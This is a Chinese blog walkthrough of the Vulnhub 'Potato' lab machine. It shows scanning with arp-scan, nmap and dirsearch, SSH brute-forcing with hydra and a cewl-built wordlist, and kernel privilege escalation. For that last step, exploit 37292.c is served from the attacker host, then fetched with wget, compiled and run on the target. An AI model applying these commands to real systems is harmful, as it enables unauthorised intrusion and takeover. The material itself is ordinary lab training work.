Vulnhub靶机实战-Potato (SunCSR)

声明

好好学习,天天向上

搭建

vmware打开,网络和攻击机一样,要么都用桥接要么都用NAT

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.31.164 -p 1-65535 -oN nmap.A

在这里插入图片描述

开启端口

发现开启80,7120

7120ssh没有用默认端口,好评

访问80

http://192.168.31.164

竟然是个图像大土豆

在这里插入图片描述

果断扫描目录

python3 dirsearch.py -u 192.168.31.164

在这里插入图片描述

info.php可以看到一些敏感信息,并无什么特别的发现,80没发现什么,也没有多余的目录可以继续探索,只能爆破了

爆破吧

先生成社工字典

cewl http://192.168.31.164/ -w user.dic

注意把首字母变成小写再来一遍

在这里插入图片描述

git上拿到top1000字典

https://github.com/k8gege/PasswordDic/blob/master/top1000.txt

hydra爆破ssh

hydra -L user.dic -P top1000.txt -vV ssh://192.168.31.164:7120 -f
pomato/letmein

在这里插入图片描述

ssh登录

ssh -p 7120 potato@192.168.31.164
letmein

在这里插入图片描述

准备提权,kali执行

searchsploit 3.13.0
cp /usr/share/exploitdb/exploits/linux/local/37292.c  ./37292.c
python -m SimpleHTTPServer 5555

靶机执行

cd /tmp
wget http://192.168.31.64:5555/37292.c
gcc 37292.c -o exp
chmod +x exp
./exp

在这里插入图片描述

总结

1.信息收集

端口发现80和7120

80只发现了phpinfo

7120是ssh

2.web权限

3.shell权限

通过ssh爆破,使用top1000字典,爆破进去了7120

4.权限维持

5.提权

通过系统内核进行提权

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值